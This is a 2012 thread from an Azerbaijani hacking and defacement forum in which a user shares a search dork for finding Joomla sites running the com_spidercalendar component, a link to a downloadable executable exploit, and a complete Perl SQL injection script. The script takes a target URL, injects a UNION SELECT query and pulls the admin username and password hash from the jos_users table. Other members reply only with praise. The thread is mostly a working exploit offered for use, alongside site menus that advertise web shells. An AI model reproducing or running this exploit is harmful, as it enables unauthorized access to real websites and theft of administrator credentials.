Anti-armenia.ORG - Forumlar - Spidercalendar Sql İnj (Kendi kodlamam) + Perl
Ana Səhifə
Forum
Yükləmələr
Proqramlarımız
F23 Encryption
MD5 Maker
Password Generator
icon Changer v1.0
Shell
wso2 shell
c99
r57
Armenian Terrorism
Armenian Terrorism
İşğal Olunmuş Rayonlar
Şəhidlər & Milli Qəhrəmanlar
Tariximiz - History
İnformasiya
Administrasiya
Armenian Terrorism
Hacking Platform
Kompüter Sistemləri
Programming
Download
İnternet Programming
PHP ASP Html,xHtml Javascript CSS
C/C++ Delphi Visual Basic Assembly
Seditio vBulletin PhpBB Wordpress Joomla..
Proqramlama Kitabları
Grafik Dizayn
Hacking Platform
Yeni Başlayanlar
Dərsliklər & Kitablar
Hack (Xaker) otağı
PC Hacking & Security
Web Hacking & Security
Mail Hacking & Security
Exploits & Vulnerabilities
Social Engineering
Hacking & Security Tools
Qaydalar
Saytın vahid indexi
İstifadəçilər
Online
Əlaqə
Ferid23
Forumlar
/
Hacking Platform
/
Hacking & Security Tools
/
Spidercalendar Sql İnj (Kendi kodlamam) + Perl
Istifadəçi
2012-10-15 07:18 GMT
Pulsar
VIP
Mesaj Sayı :
21
Mövzu Sayı :
Rep Ver :
Rep Sayı :
0
Indi Saytda :
Cinsiyyət :
Oğlan
Şəhər :
Kayseri
Ölkə :
Məslək :
pulsar
Yaş :
Mesaj :
Dork:
inurl:index.php?option=com_spidercalendar
#######################################
Benim Exploit (vbnet) :
http://tehlikeliuzay.com/pro/com-spidercalendar/com-spidercalendar.exe
Anivirüs Taraması Sonucu:
http://r.virscan.org/report/768cba1f5d3863eb827c2c5d458342d6.html
Ekran:
#######################################
Perl Exploit:
Kod:
#!/usr/bin/perl -w
# Joomla Component (spidercalendar) Remote SQL Exploit
#----------------------------------------------------------------------------#
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_spidercalendar Remote Sql Exploit \n";
print "\t\n\n";
use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="null";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $target . "index.php?option=com_spidercalendar&date=999999.9' union all select ".$d4n."%2Cnull%2Cconcat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)%2Cnull%2Cnull%2Cnull from ".$table."+--+ D4NB4R";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Datos Extraidos son:\n";
print "\n
* Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/<pass>(.*?)<pass>/){print "\n
* Admin Hash : $1\n\n";
print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by D4NB4R --------------------#
########################################
Özgürlük benim karakterimdir ! (M.Kemal Atatürk)
Anti-armenia.ORG
Istifadəçi
2012-10-15 08:50 GMT
Ferid23
Admin
Mesaj Sayı :
1875
Mövzu Sayı :
Rep Ver :
Rep Sayı :
45
Indi Saytda :
Cinsiyyət :
Oğlan
Şəhər :
Anti-armenia.ORG
Ölkə :
Məslək :
Programmer & Defacer
Yaş :
12
Mesaj :
Super! Əllərinə sağlıq qardaşım
AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin):
http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
Istifadəçi
2012-10-15 15:36 GMT
Avatar Fearless
VIP
Mesaj Sayı :
1299
Mövzu Sayı :
Rep Ver :
Rep Sayı :
23
Indi Saytda :
Cinsiyyət :
Oğlan
Şəhər :
Gävle
Ölkə :
Məslək :
Hacker,Defacer,Programmer
Yaş :
26
Mesaj :
Əla
Təbriklər =)
Anti-armenia.ORG
Istifadəçi
2012-10-16 10:35 GMT
Pulsar
VIP
Mesaj Sayı :
21
Mövzu Sayı :
Rep Ver :
Rep Sayı :
0
Indi Saytda :
Cinsiyyət :
Oğlan
Şəhər :
Kayseri
Ölkə :
Məslək :
pulsar
Yaş :
Mesaj :
Sziler de sağolun kardeşlerim
Özgürlük benim karakterimdir ! (M.Kemal Atatürk)
Anti-armenia.ORG